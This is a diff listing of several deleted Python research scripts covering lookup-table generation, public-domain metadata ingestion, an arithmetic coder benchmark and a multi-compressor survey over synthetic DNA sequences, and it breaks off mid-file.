|
||||||
Returns:
|
|
||||||
Concept vector
|
|
||||||
"""
|
|
||||||
# Simple transformation (in full implementation, use more sophisticated mapping)
|
|
||||||
return ConceptVector14(
|
|
||||||
vector=intent_vector,
|
|
||||||
archive_id=f"intent_{hashlib.sha256(intent_vector.tobytes()).hexdigest()[:16]}"
|
|
||||||
)
|
|
||||||
|
|
||||||
def generate_metatype(self, surface_data: Dict, substrate_data: Dict, intent_data: Dict) -> Dict:
|
|
||||||
"""
|
|
||||||
Generate metatype from integration of layers
|
|
||||||
|
|
||||||
Args:
|
|
||||||
surface_data: Data from surface layer
|
|
||||||
substrate_data: Data from substrate layer
|
|
||||||
intent_data: Data from intent layer
|
|
||||||
|
|
||||||
Returns:
|
|
||||||
Metatype dictionary
|
|
||||||
"""
|
|
||||||
# Simple metatype generation (in full implementation, use self-typing engine)
|
|
||||||
return {
|
|
||||||
"type_signature": f"{substrate_data.get('type', 'unknown')}:{surface_data.get('type', 'unknown')}:{intent_data.get('type', 'unknown')}",
|
|
||||||
"confidence": 0.5,
|
|
||||||
"source_layers": ["substrate", "surface", "intent"]
|
|
||||||
}
|
|
||||||
|
|
||||||
def get_cache_stats(self) -> Dict:
|
|
||||||
"""Get cache statistics"""
|
|
||||||
return {
|
|
||||||
"cache_size": len(self.cache),
|
|
||||||
"witness_count": len(self.witnesses),
|
|
||||||
"connection_pool_size": len(self.connection_pool)
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
def main():
|
|
||||||
"""Test substrate bridge with ENE database"""
|
|
||||||
db_path = "/home/allaun/Documents/Research Stack/data/substrate_index.db"
|
|
||||||
|
|
||||||
try:
|
|
||||||
bridge = SubstrateBridge(db_path)
|
|
||||||
|
|
||||||
# Test read
|
|
||||||
vector = bridge.read_coordinate("test_archive_id")
|
|
||||||
print(f"Read vector: {vector}")
|
|
||||||
|
|
||||||
# Test batch read
|
|
||||||
results = bridge.batch_read(["test_archive_id_1", "test_archive_id_2"])
|
|
||||||
print(f"Batch read: {len(results)} results")
|
|
||||||
|
|
||||||
# Get cache stats
|
|
||||||
stats = bridge.get_cache_stats()
|
|
||||||
print(f"Cache stats: {stats}")
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error testing substrate bridge: {e}")
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
main()
|
|
||||||
|
|
@ -1,84 +0,0 @@
|
||||||
import numpy as np
|
|
||||||
import math
|
|
||||||
|
|
||||||
# Constants in Q16.16
|
|
||||||
Q_ONE = 0x00010000
|
|
||||||
DRAKE_CONST = 196
|
|
||||||
DRIFT_CONST = 65
|
|
||||||
LAMBDA = Q_ONE
|
|
||||||
M_STAR = 32768
|
|
||||||
|
|
||||||
def get_ne_log(bin_val):
|
|
||||||
n = bin_val + 1
|
|
||||||
return int(math.log2(n) * Q_ONE)
|
|
||||||
|
|
||||||
def is_locally_lawful(mu_bin, rho_bin, c_bin, m_bin, ne_bin, sig_bin):
|
|
||||||
uq = 0x41 * (mu_bin + 1)
|
|
||||||
rhoq = 0x2000 * (rho_bin + 1)
|
|
||||||
cfac = 0x2000 * (c_bin + 1)
|
|
||||||
mfac = 0x2000 * (m_bin + 1)
|
|
||||||
sigq = Q_ONE + (0x4000 * (sig_bin + 1))
|
|
||||||
Ne = get_ne_log(ne_bin)
|
|
||||||
|
|
||||||
l1 = uq <= (DRAKE_CONST * Q_ONE) // cfac
|
|
||||||
phi = Q_ONE - abs(mfac - M_STAR)
|
|
||||||
drift_val = ((rhoq * Ne) // Q_ONE * phi) // Q_ONE
|
|
||||||
l2 = drift_val >= DRIFT_CONST
|
|
||||||
l3 = sigq > Q_ONE + (LAMBDA * uq) // Q_ONE
|
|
||||||
|
|
||||||
mask = (1 if not l1 else 0) | (2 if not l2 else 0) | (4 if not l3 else 0)
|
|
||||||
return (l1 and l2 and l3), mask
|
|
||||||
|
|
||||||
def solve_trajectory(mu_bin, rho_bin, c_bin, m_bin, ne_bin, sig_bin):
|
|
||||||
curr = (mu_bin, rho_bin, c_bin, m_bin, ne_bin, sig_bin)
|
|
||||||
states = [curr]
|
|
||||||
lawful_trajectory = True
|
|
||||||
|
|
||||||
for s in range(3):
|
|
||||||
m, r, c, mo, n, s_val = states[-1]
|
|
||||||
ok, _ = is_locally_lawful(m, r, c, mo, n, s_val)
|
|
||||||
if not ok:
|
|
||||||
lawful_trajectory = False
|
|
||||||
|
|
||||||
# Beta Function: Coarse-graining
|
|
||||||
new_mu = max(0, m - 1)
|
|
||||||
new_ne = min(7, n + 1)
|
|
||||||
states.append((new_mu, r, c, mo, new_ne, s_val))
|
|
||||||
|
|
||||||
return lawful_trajectory, states[-1]
|
|
||||||
|
|
||||||
def generate_lut():
|
|
||||||
dt = np.dtype([
|
|
||||||
('bits', 'u1'), # L_now|L_flow|L_att|Noise|Sab
|
|
||||||
('failure', 'u1'), # Mask: 1|2|4|8
|
|
||||||
('cost', 'u4'),
|
|
||||||
('margin', 'u1'),
|
|
||||||
('depth', 'u1'),
|
|
||||||
('attr_id', 'u1'),
|
|
||||||
('p1', 'u1'), ('p2', 'u1'), ('p3', 'u1'), ('p4', 'u1'), ('p5', 'u1'), ('p6', 'u1'), ('p7', 'u1')
|
|
||||||
])
|
|
||||||
lut = np.zeros(262144, dtype=dt)
|
|
||||||
|
|
||||||
for addr in range(262144):
|
|
||||||
mu_bin = (addr >> 0) & 0x7
|
|
||||||
rho_bin = (addr >> 3) & 0x7
|
|
||||||
c_bin = (addr >> 6) & 0x7
|
|
||||||
m_bin = (addr >> 9) & 0x7
|
|
||||||
ne_bin = (addr >> 12) & 0x7
|
|
||||||
sig_bin = (addr >> 15) & 0x7
|
|
||||||
|
|
||||||
l_now, mask = is_locally_lawful(mu_bin, rho_bin, c_bin, m_bin, ne_bin, sig_bin)
|
|
||||||
l_flow, attractor = solve_trajectory(mu_bin, rho_bin, c_bin, m_bin, ne_bin, sig_bin)
|
|
||||||
|
|
||||||
bits = (1 if l_now else 0) | (2 if l_flow else 0)
|
|
||||||
final_mask = mask | (8 if l_now and not l_flow else 0)
|
|
||||||
|
|
||||||
lut[addr] = (bits, final_mask, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0)
|
|
||||||
|
|
||||||
return lut
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
lut_data = generate_lut()
|
|
||||||
output_path = "/home/allaun/Documents/Research Stack/data/swarm/adaptation_surface.bin"
|
|
||||||
lut_data.tofile(output_path)
|
|
||||||
print(f"SUCCESS: Precomputed RGFlow Trajectories (16-byte Master Entry)")
|
|
||||||
|
|
@ -1,73 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Public Domain Ingestion Orchestrator
|
|
||||||
Target: /mnt/gdrive/Research_Archive/
|
|
||||||
Orchestrates high-volume ingestion from Openverse, IA, and Europeana.
|
|
||||||
"""
|
|
||||||
|
|
||||||
import os
|
|
||||||
import requests
|
|
||||||
import json
|
|
||||||
from pathlib import Path
|
|
||||||
|
|
||||||
# --- Configuration ---
|
|
||||||
GDRIVE_PATH = Path("/home/allaun/Documents/Research Stack/data/ingestion")
|
|
||||||
GDRIVE_PATH.mkdir(parents=True, exist_ok=True)
|
|
||||||
|
|
||||||
# Placeholder for API credentials (user can fill later)
|
|
||||||
CREDS = {
|
|
||||||
"openverse": os.getenv("OPENVERSE_API_KEY", ""),
|
|
||||||
"ia": os.getenv("INTERNET_ARCHIVE_S3_KEY", ""),
|
|
||||||
"europeana": os.getenv("EUROPEANA_API_KEY", "")
|
|
||||||
}
|
|
||||||
|
|
||||||
def pull_openverse(query, limit=100):
|
|
||||||
"""Pull metadata and links for open domain works."""
|
|
||||||
print(f"[INGEST] Searching Openverse for: {query}")
|
|
||||||
url = "https://api.openverse.engineering/v1/images/"
|
|
||||||
params = {"q": query, "license_type": "publicdomain", "page_size": limit}
|
|
||||||
headers = {"Authorization": f"Token {CREDS['openverse']}"} if CREDS['openverse'] else {}
|
|
||||||
|
|
||||||
res = requests.get(url, params=params, headers=headers)
|
|
||||||
if res.status_code == 200:
|
|
||||||
data = res.json()
|
|
||||||
out_file = GDRIVE_PATH / f"openverse_{query.replace(' ', '_')}.json"
|
|
||||||
with open(out_file, "w") as f:
|
|
||||||
json.dump(data, f, indent=2)
|
|
||||||
print(f"[SUCCESS] Saved {len(data['results'])} records to {out_file}")
|
|
||||||
else:
|
|
||||||
print(f"[ERROR] Openverse failed: {res.status_code}")
|
|
||||||
|
|
||||||
def pull_ia_metadata(query, limit=50):
|
|
||||||
"""Pull metadata from Internet Archive based on query."""
|
|
||||||
print(f"[INGEST] Searching Internet Archive for: {query}")
|
|
||||||
url = "https://archive.org/advancedsearch.php"
|
|
||||||
params = {
|
|
||||||
"q": f"{query} AND (licenseurl:*publicdomain* OR mediaprotocol:publicdomain)",
|
|
||||||
"output": "json",
|
|
||||||
"rows": limit,
|
|
||||||
"page": 1
|
|
||||||
}
|
|
||||||
res = requests.get(url, params=params)
|
|
||||||
if res.status_code == 200:
|
|
||||||
data = res.json()
|
|
||||||
out_file = GDRIVE_PATH / f"ia_{query.replace(' ', '_')}.json"
|
|
||||||
with open(out_file, "w") as f:
|
|
||||||
json.dump(data, f, indent=2)
|
|
||||||
print(f"[SUCCESS] Saved IA records to {out_file}")
|
|
||||||
else:
|
|
||||||
print(f"[ERROR] IA failed: {res.status_code}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
# Initial seeds for the Informatic Manifold
|
|
||||||
seeds = [
|
|
||||||
"theoretical physics",
|
|
||||||
"neuromorphic computing",
|
|
||||||
"pure mathematics",
|
|
||||||
"maritime navigation",
|
|
||||||
"sovereignty"
|
|
||||||
]
|
|
||||||
|
|
||||||
for s in seeds:
|
|
||||||
pull_openverse(s)
|
|
||||||
pull_ia_metadata(s)
|
|
||||||
|
|
@ -1,95 +0,0 @@
|
||||||
import numpy as np
|
|
||||||
import json
|
|
||||||
import os
|
|
||||||
import math
|
|
||||||
from pathlib import Path
|
|
||||||
|
|
||||||
# --- Configuration ---
|
|
||||||
LUT_PATH = "/home/allaun/Documents/Research Stack/data/swarm/adaptation_surface.bin"
|
|
||||||
INGEST_DIR = Path("/home/allaun/Documents/Research Stack/data/ingestion")
|
|
||||||
HARDENED_DIR = INGEST_DIR / "hardened"
|
|
||||||
LUT_DT = np.dtype([('lawful','u1'), ('dk','u1'), ('df','u1'), ('er','u1'), ('cost','u4')])
|
|
||||||
|
|
||||||
# Load LUT
|
|
||||||
try:
|
|
||||||
ADAPTATION_SURFACE = np.fromfile(LUT_PATH, dtype=LUT_DT)
|
|
||||||
except Exception as e:
|
|
||||||
print(f"Error loading LUT: {e}")
|
|
||||||
exit(1)
|
|
||||||
|
|
||||||
def map_to_genome(item):
|
|
||||||
"""
|
|
||||||
Maps IA metadata to 18-bit address (6 dims * 3 bits).
|
|
||||||
Normalized to 0-7 range per dimension.
|
|
||||||
"""
|
|
||||||
# 1. uBin (Mutation/Entropy): Inverse of metadata completeness
|
|
||||||
# Max possible fields ~20. Map (20-count) to 0-7.
|
|
||||||
metadata_count = len(item.keys())
|
|
||||||
uBin = max(0, min(7, (20 - metadata_count) // 2))
|
|
||||||
|
|
||||||
# 2. neBin (Population): Log of downloads
|
|
||||||
downloads = int(item.get('downloads', 0))
|
|
||||||
# Log2 mapping: 0-7 range for 1 to 100k downloads
|
|
||||||
neBin = max(0, min(7, int(math.log2(downloads + 1) / 2)))
|
|
||||||
|
|
||||||
# 3. sigBin (Fitness): Relevancy or index
|
|
||||||
# We'll use the 'week' (trending) or just default to 4 for research seeds
|
|
||||||
sigBin = 4
|
|
||||||
|
|
||||||
# 4. cBin (Connectance): Related identifiers count
|
|
||||||
# IA often has 'identifier-access' or similar.
|
|
||||||
# Use length of 'identifier' as dummy connectance.
|
|
||||||
cBin = max(0, min(7, len(item.get('identifier', '')) // 5))
|
|
||||||
|
|
||||||
# 5. mBin (Modularity): Format count
|
|
||||||
# Placeholder for multi-format records
|
|
||||||
mBin = 3
|
|
||||||
|
|
||||||
# 6. xBin (Reserved/Noise)
|
|
||||||
xBin = 0
|
|
||||||
|
|
||||||
# Pack 18-bit address
|
|
||||||
addr = (uBin & 0x7) | ((neBin & 0x7) << 3) | ((sigBin & 0x7) << 6) | \
|
|
||||||
((cBin & 0x7) << 9) | ((mBin & 0x7) << 12) | ((xBin & 0x7) << 15)
|
|
||||||
return addr
|
|
||||||
|
|
||||||
def sweep():
|
|
||||||
print(f"--- Initiating Manifold Hardening Sweep ---")
|
|
||||||
total_found = 0
|
|
||||||
total_kept = 0
|
|
||||||
total_pruned = 0
|
|
||||||
|
|
||||||
for fpath in INGEST_DIR.glob("ia_*.json"):
|
|
||||||
print(f"Processing: {fpath.name}")
|
|
||||||
with open(fpath, 'r') as f:
|
|
||||||
data = json.load(f)
|
|
||||||
|
|
||||||
# IA response structure: { 'response': { 'docs': [...] } }
|
|
||||||
docs = data.get('response', {}).get('docs', [])
|
|
||||||
hardened_docs = []
|
|
||||||
|
|
||||||
for doc in docs:
|
|
||||||
total_found += 1
|
|
||||||
addr = map_to_genome(doc)
|
|
||||||
state = ADAPTATION_SURFACE[addr]
|
|
||||||
|
|
||||||
if state['lawful']:
|
|
||||||
hardened_docs.append(doc)
|
|
||||||
total_kept += 1
|
|
||||||
else:
|
|
||||||
total_pruned += 1
|
|
||||||
|
|
||||||
# Save hardened version
|
|
||||||
output_file = HARDENED_DIR / fpath.name
|
|
||||||
with open(output_file, 'w') as f:
|
|
||||||
json.dump({'docs': hardened_docs}, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\n--- Sweep Results ---")
|
|
||||||
print(f"Total Records Analyzed: {total_found}")
|
|
||||||
print(f"Total Lawful Records: {total_kept}")
|
|
||||||
print(f"Total Records Pruned: {total_pruned}")
|
|
||||||
if total_found > 0:
|
|
||||||
print(f"Manifold Cleanliness: {total_kept/total_found*100:.2f}%")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
sweep()
|
|
||||||
|
|
@ -1,208 +0,0 @@
|
||||||
# PROPRIETARY -- ALL RIGHTS RESERVED
|
|
||||||
# Copyright (c) 2026 Allaun Holdings
|
|
||||||
# See THIRD_PARTY_NOTICES.txt for third-party attributions.
|
|
||||||
|
|
||||||
"""
|
|
||||||
Simple arithmetic coder using byte-oriented range coding.
|
|
||||||
Based on standard practice (Schindler/Moffat/Storer).
|
|
||||||
No threading, no complex buffering — just works.
|
|
||||||
"""
|
|
||||||
|
|
||||||
import sys
|
|
||||||
from typing import Tuple
|
|
||||||
|
|
||||||
TOP = 0xFFFFFFFF
|
|
||||||
BOT = 0x01000000
|
|
||||||
SHIFT = 24
|
|
||||||
|
|
||||||
|
|
||||||
class SimpleArithEncoder:
|
|
||||||
def __init__(self):
|
|
||||||
self.low = 0
|
|
||||||
self.high = TOP
|
|
||||||
self.out = []
|
|
||||||
self.buf = 0
|
|
||||||
self.bcnt = 0
|
|
||||||
|
|
||||||
def _emit(self, b: int):
|
|
||||||
self.out.append(b)
|
|
||||||
|
|
||||||
def _flush(self):
|
|
||||||
for _ in range(4):
|
|
||||||
self._emit((self.low >> 24) & 0xFF)
|
|
||||||
self.low <<= 8
|
|
||||||
|
|
||||||
def encode_byte(self, sym: int, cum_lo: int, cum_hi: int, total: int):
|
|
||||||
"""Encode symbol given cumulative frequency bounds."""
|
|
||||||
rng = self.high - self.low + 1
|
|
||||||
self.high = self.low + (rng * cum_hi) // total - 1
|
|
||||||
self.low += (rng * cum_lo) // total
|
|
||||||
while True:
|
|
||||||
if self.high < 0x80000000:
|
|
||||||
self._emit(0)
|
|
||||||
elif self.low >= 0x80000000:
|
|
||||||
self._emit(1)
|
|
||||||
self.low -= 0x80000000
|
|
||||||
self.high -= 0x80000000
|
|
||||||
elif self.low >= 0x40000000 and self.high < 0xC0000000:
|
|
||||||
self.buf += 1
|
|
||||||
self.low -= 0x40000000
|
|
||||||
self.high -= 0x40000000
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
self.low <<= 1
|
|
||||||
self.high = (self.high << 1) | 1
|
|
||||||
|
|
||||||
def finish(self) -> bytes:
|
|
||||||
self.buf += 1
|
|
||||||
if self.low < 0x40000000:
|
|
||||||
self._emit(0)
|
|
||||||
for _ in range(self.buf):
|
|
||||||
self._emit(1)
|
|
||||||
else:
|
|
||||||
self._emit(1)
|
|
||||||
for _ in range(self.buf):
|
|
||||||
self._emit(0)
|
|
||||||
self._flush()
|
|
||||||
return bytes(self.out)
|
|
||||||
|
|
||||||
|
|
||||||
class SimpleArithDecoder:
|
|
||||||
def __init__(self, data: bytes):
|
|
||||||
self.data = data
|
|
||||||
self.pos = 0
|
|
||||||
self.low = 0
|
|
||||||
self.high = TOP
|
|
||||||
self.code = 0
|
|
||||||
for _ in range(4):
|
|
||||||
self.code = (self.code << 8) | self._next_byte()
|
|
||||||
|
|
||||||
def _next_byte(self) -> int:
|
|
||||||
if self.pos < len(self.data):
|
|
||||||
b = self.data[self.pos]
|
|
||||||
self.pos += 1
|
|
||||||
return b
|
|
||||||
return 0
|
|
||||||
|
|
||||||
def decode_sym(self, freq_table, total: int) -> int:
|
|
||||||
"""Decode a symbol given a frequency table (list of counts). Returns symbol index."""
|
|
||||||
rng = self.high - self.low + 1
|
|
||||||
target = ((self.code - self.low + 1) * total - 1) // rng
|
|
||||||
|
|
||||||
cum = 0
|
|
||||||
sym = 0
|
|
||||||
for i, cnt in enumerate(freq_table):
|
|
||||||
cum += cnt
|
|
||||||
if cum > target:
|
|
||||||
sym = i
|
|
||||||
cum_lo = cum - cnt
|
|
||||||
cum_hi = cum
|
|
||||||
break
|
|
||||||
else:
|
|
||||||
sym = len(freq_table) - 1
|
|
||||||
cum_lo = cum - freq_table[-1] if freq_table else 0
|
|
||||||
cum_hi = total
|
|
||||||
|
|
||||||
self.high = self.low + (rng * cum_hi) // total - 1
|
|
||||||
self.low += (rng * cum_lo) // total
|
|
||||||
|
|
||||||
while True:
|
|
||||||
if self.high < 0x80000000:
|
|
||||||
pass
|
|
||||||
elif self.low >= 0x80000000:
|
|
||||||
self.code -= 0x80000000
|
|
||||||
self.low -= 0x80000000
|
|
||||||
self.high -= 0x80000000
|
|
||||||
elif self.low >= 0x40000000 and self.high < 0xC0000000:
|
|
||||||
self.code -= 0x40000000
|
|
||||||
self.low -= 0x40000000
|
|
||||||
self.high -= 0x40000000
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
self.low <<= 1
|
|
||||||
self.high = (self.high << 1) | 1
|
|
||||||
self.code = (self.code << 1) | self._next_byte()
|
|
||||||
|
|
||||||
return sym
|
|
||||||
|
|
||||||
|
|
||||||
class Order0ArithCoder:
|
|
||||||
"""
|
|
||||||
Order-0 adaptive arithmetic coder.
|
|
||||||
Counts symbol frequencies and encodes/decodes with cumulative distributions.
|
|
||||||
Simple, correct, fast. Baseline to beat gzip.
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.freqs = [1] * 256 # Laplace smoothed (no zero-prob symbols)
|
|
||||||
self.total = 256
|
|
||||||
|
|
||||||
def _cumulative(self, sym: int) -> Tuple[int, int, int]:
|
|
||||||
"""Return (cum_lo, cum_hi, total) for symbol."""
|
|
||||||
cum = 0
|
|
||||||
for i in range(sym):
|
|
||||||
cum += self.freqs[i]
|
|
||||||
return cum, cum + self.freqs[sym], self.total
|
|
||||||
|
|
||||||
def compress(self, data: bytes) -> bytes:
|
|
||||||
enc = SimpleArithEncoder()
|
|
||||||
freqs = [1] * 256
|
|
||||||
total = 256
|
|
||||||
|
|
||||||
for b in data:
|
|
||||||
b = b & 0xFF
|
|
||||||
cum_lo, cum_hi, _ = self._cumulative(b)
|
|
||||||
enc.encode_byte(b, cum_lo, cum_hi, total)
|
|
||||||
freqs[b] += 1
|
|
||||||
total += 1
|
|
||||||
|
|
||||||
return enc.finish()
|
|
||||||
|
|
||||||
def decompress(self, compressed: bytes, length: int) -> bytes:
|
|
||||||
dec = SimpleArithDecoder(compressed)
|
|
||||||
freqs = [1] * 256
|
|
||||||
total = 256
|
|
||||||
result = bytearray()
|
|
||||||
|
|
||||||
for _ in range(length):
|
|
||||||
sym = dec.decode_sym(freqs, total)
|
|
||||||
result.append(sym)
|
|
||||||
freqs[sym] += 1
|
|
||||||
total += 1
|
|
||||||
|
|
||||||
return bytes(result)
|
|
||||||
|
|
||||||
def roundtrip(self, data: bytes) -> Tuple[bool, int, int]:
|
|
||||||
"""Test roundtrip. Returns (success, compressed_size, original_size)."""
|
|
||||||
c = self.compress(data)
|
|
||||||
d = self.decompress(c, len(data))
|
|
||||||
return data == d, len(c), len(data)
|
|
||||||
|
|
||||||
|
|
||||||
def bench_arith(data: bytes, label: str, quiet=False) -> dict:
|
|
||||||
"""Benchmark and verify roundtrip."""
|
|
||||||
import time
|
|
||||||
coder = Order0ArithCoder()
|
|
||||||
|
|
||||||
t0 = time.time()
|
|
||||||
compressed = coder.compress(data)
|
|
||||||
ct = time.time() - t0
|
|
||||||
|
|
||||||
t0 = time.time()
|
|
||||||
decompressed = coder.decompress(compressed, len(data))
|
|
||||||
dt = time.time() - t0
|
|
||||||
|
|
||||||
ok = data == decompressed
|
|
||||||
if not ok:
|
|
||||||
errors = sum(1 for a, b in zip(data, decompressed) if a != b)
|
|
||||||
return {"label": label, "ok": False, "errors": errors, "compressed_bytes": len(compressed)}
|
|
||||||
|
|
||||||
return {
|
|
||||||
"label": label, "ok": True,
|
|
||||||
"original": len(data),
|
|
||||||
"compressed": len(compressed),
|
|
||||||
"ratio": round(len(compressed) / len(data), 4),
|
|
||||||
"bpb": round(len(compressed) * 8 / len(data), 3),
|
|
||||||
"comp_s": round(ct, 3),
|
|
||||||
"dec_s": round(dt, 3),
|
|
||||||
}
|
|
||||||
|
|
@ -1,504 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Compressor Manifold Survey — Complete Lossless Compression Eigenvector Map
|
|
||||||
===========================================================================
|
|
||||||
|
|
||||||
Covers 28 lossless compressors across 4 domains applied to a 54-sequence
|
|
||||||
artificial genetic corpus. Builds cross-compressor NCD covariance matrices
|
|
||||||
and extracts manifold coordinates via PCA/eigenvalue decomposition.
|
|
||||||
|
|
||||||
Compressors by domain:
|
|
||||||
General: brotli, zstd, xz, gzip, bzip2, lz4, lzo, lzop, lzma, pigz,
|
|
||||||
pbzip2, lbzip2, lrzip, zopfli, 7z, pixz
|
|
||||||
Audio: flac (default), flac -8, wavpack, wavpack -hhx, alac
|
|
||||||
Video: ffv1, ffvhuff, huffyuv, utvideo, lagarith (via FFmpeg)
|
|
||||||
Image: png, jpeg-xl, webp, qoi
|
|
||||||
|
|
||||||
Manifold extraction method:
|
|
||||||
1. For each pair of compressors, compute Spearman ρ of their NCD values
|
|
||||||
across all 1431 sequence pairs → 28×28 compressor similarity matrix
|
|
||||||
2. PCA on similarity matrix → compressor manifold coordinates in R^3
|
|
||||||
3. Eigen-decompose for natural cluster structure
|
|
||||||
"""
|
|
||||||
|
|
||||||
import os, sys, json, time, subprocess, tempfile, hashlib, random
|
|
||||||
import numpy as np
|
|
||||||
from collections import defaultdict, Counter
|
|
||||||
from pathlib import Path
|
|
||||||
from scipy import stats
|
|
||||||
from scipy.spatial.distance import pdist, squareform
|
|
||||||
|
|
||||||
# ── Config ──
|
|
||||||
OUTDIR = Path("/home/allaun/dna_benchmark/compressor_manifold")
|
|
||||||
OUTDIR.mkdir(parents=True, exist_ok=True)
|
|
||||||
CORPUSDIR = OUTDIR / "corpus"
|
|
||||||
CORPUSDIR.mkdir(exist_ok=True)
|
|
||||||
|
|
||||||
SEQUENCE_LENGTH = 50_000 # halved for 28-compressor feasibility
|
|
||||||
SEED = 42
|
|
||||||
|
|
||||||
# ── Compressor Registry ──
|
|
||||||
|
|
||||||
COMPRESSORS = {
|
|
||||||
# General — block/BWT/dictionary
|
|
||||||
"brotli": {"domain": "general", "family": "LZ77+context", "cmd": ["brotli", "-q", "11", "-f", "-c"], "ext": ".br"},
|
|
||||||
"zstd": {"domain": "general", "family": "LZ77+FSE", "cmd": ["zstd", "-19", "-q", "-f", "-c"], "ext": ".zst"},
|
|
||||||
"xz": {"domain": "general", "family": "LZMA2", "cmd": ["xz", "-9", "-f", "-c", "-z"], "ext": ".xz"},
|
|
||||||
"gzip": {"domain": "general", "family": "DEFLATE", "cmd": ["gzip", "-9", "-f", "-c"], "ext": ".gz"},
|
|
||||||
"bzip2": {"domain": "general", "family": "BWT+Huffman", "cmd": ["bzip2", "-9", "-f", "-c", "-z"], "ext": ".bz2"},
|
|
||||||
"lz4": {"domain": "general", "family": "LZ4-block", "cmd": ["lz4", "-9", "-f", "-c"], "ext": ".lz4"},
|
|
||||||
"lzo": {"domain": "general", "family": "LZO", "cmd": ["lzop", "-9", "-f", "-c"], "ext": ".lzo"},
|
|
||||||
"lzop": {"domain": "general", "family": "LZO-fast", "cmd": ["lzop", "-1", "-f", "-c"], "ext": ".lzo"},
|
|
||||||
"lzma": {"domain": "general", "family": "LZMA-standalone", "cmd": ["lzma", "-9", "-f", "-c", "-z"], "ext": ".lzma"},
|
|
||||||
"pigz": {"domain": "general", "family": "DEFLATE-para", "cmd": ["pigz", "-9", "-f", "-c"], "ext": ".gz"},
|
|
||||||
"pbzip2": {"domain": "general", "family": "BWT-para", "cmd": ["pbzip2", "-9", "-f", "-c", "-z"], "ext": ".bz2"},
|
|
||||||
"lbzip2": {"domain": "general", "family": "BWT-para2", "cmd": ["lbzip2", "-9", "-f", "-c", "-z"], "ext": ".bz2"},
|
|
||||||
"lrzip": {"domain": "general", "family": "RZIP+LZMA", "cmd": ["lrzip", "-L9", "-f", "-o", None, None], "ext": ".lrz", "custom": True},
|
|
||||||
"zopfli": {"domain": "general", "family": "DEFLATE-dense", "cmd": ["zopfli", "--i1000", "-c"], "ext": ".gz"},
|
|
||||||
"7z": {"domain": "general", "family": "LZMA2-solid", "cmd": None, "ext": ".7z", "custom": True},
|
|
||||||
"pixz": {"domain": "general", "family": "XZ-para", "cmd": ["pixz", "-9"], "ext": ".xz", "custom": True},
|
|
||||||
|
|
||||||
# Audio — spectral/predictive
|
|
||||||
"flac": {"domain": "audio", "family": "linear-predict", "cmd": None, "ext": ".flac", "custom": True},
|
|
||||||
"flac-8": {"domain": "audio", "family": "linear-predict-dense", "cmd": None, "ext": ".flac", "custom": True},
|
|
||||||
"wavpack": {"domain": "audio", "family": "hybrid-predict", "cmd": None, "ext": ".wv", "custom": True},
|
|
||||||
"wavpack-hhx":{"domain": "audio", "family": "hybrid-predict-dense", "cmd": None, "ext": ".wv", "custom": True},
|
|
||||||
|
|
||||||
# Video — intra-frame predictive
|
|
||||||
"ffv1": {"domain": "video", "family": "intra-predict", "cmd": None, "ext": ".mkv", "custom": True},
|
|
||||||
"ffvhuff": {"domain": "video", "family": "Huffman-intra", "cmd": None, "ext": ".avi", "custom": True},
|
|
||||||
"huffyuv": {"domain": "video", "family": "Huffman-YUV", "cmd": None, "ext": ".avi", "custom": True},
|
|
||||||
"utvideo": {"domain": "video", "family": "predict-YUV", "cmd": None, "ext": ".avi", "custom": True},
|
|
||||||
|
|
||||||
# Image — spatial/predictive
|
|
||||||
"png": {"domain": "image", "family": "DEFLATE-spatial", "cmd": None, "ext": ".png", "custom": True},
|
|
||||||
"jpeg-xl": {"domain": "image", "family": "VarDCT", "cmd": None, "ext": ".jxl", "custom": True},
|
|
||||||
"webp": {"domain": "image", "family": "VP8-spatial", "cmd": None, "ext": ".webp", "custom": True},
|
|
||||||
}
|
|
||||||
|
|
||||||
# ── Sequence Corpus (reused from eigenvalue_survey) ──
|
|
||||||
|
|
||||||
def build_corpus():
|
|
||||||
import gzip as gz
|
|
||||||
|
|
||||||
corpus = {}
|
|
||||||
rng_local = np.random.RandomState(SEED)
|
|
||||||
|
|
||||||
# Load E. coli for Markov training
|
|
||||||
ecoli_path = "/home/allaun/dna_benchmark/data/ecoli.fna.gz"
|
|
||||||
if os.path.exists(ecoli_path):
|
|
||||||
raw = []
|
|
||||||
with gz.open(ecoli_path, "rt") as f:
|
|
||||||
for line in f:
|
|
||||||
if not line.startswith(">"):
|
|
||||||
raw.append(line.strip().upper())
|
|
||||||
ecoli_data = "".join(raw)
|
|
||||||
else:
|
|
||||||
ecoli_data = "A" * 1000000
|
|
||||||
|
|
||||||
trans = defaultdict(lambda: defaultdict(int))
|
|
||||||
order = 2
|
|
||||||
for i in range(len(ecoli_data) - order):
|
|
||||||
ctx = ecoli_data[i:i+order]
|
|
||||||
nxt = ecoli_data[i+order]
|
|
||||||
trans[ctx][nxt] += 1
|
|
||||||
|
|
||||||
idx = 0
|
|
||||||
n = SEQUENCE_LENGTH
|
|
||||||
|
|
||||||
# Uniform (5)
|
|
||||||
for base in ["A", "C", "G", "T"]:
|
|
||||||
corpus[f"uniform_{base}"] = base * n
|
|
||||||
idx += 1
|
|
||||||
|
|
||||||
# Random (4)
|
|
||||||
for s in range(4):
|
|
||||||
seq = "".join(chr(65 + rng_local.randint(0, 4)) for _ in range(n))
|
|
||||||
seq = seq.replace("E", "T").replace("B", "G").replace("D", "C")
|
|
||||||
corpus[f"random_{s}"] = seq
|
|
||||||
|
|
||||||
# Codon (4)
|
|
||||||
codons = [c for c in ["TTT","TTC","TTA","TTG","TCT","TCC","TCA","TCG","CTT","CTC","CTA","CTG",
|
|
||||||
"CCT","CCC","CCA","CCG","ATT","ATC","ATA","ATG","ACT","ACC","ACA","ACG",
|
|
||||||
"GTT","GTC","GTA","GTG","GCT","GCC","GCA","GCG","CGT","CGC","CGA","CGG","CGG",
|
|
||||||
